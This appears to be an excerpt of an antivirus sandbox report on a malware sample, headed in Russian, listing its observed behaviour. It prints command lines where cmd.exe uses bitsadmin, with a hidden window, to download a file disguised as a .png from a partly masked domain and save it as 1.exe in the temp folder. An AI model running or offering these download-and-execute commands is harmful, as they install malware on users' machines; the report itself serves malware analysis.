Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer j1 http://vo###noibc.us/78634956392859/7888hftgysdfgl.png %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://vo###noibc.us/78634956392859/index.ph...
- DNS ASK vo###noibc.us
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer j1 http://vo###noibc.us/78634956392859/7888hftgysdfgl.png %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://vo###noibc.us/78634956392859/index.ph...' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer j1 http://vo###noibc.us/78634956392859/7888hftgysdfgl.png %LOCALAPPDATA%\Temp/1.exe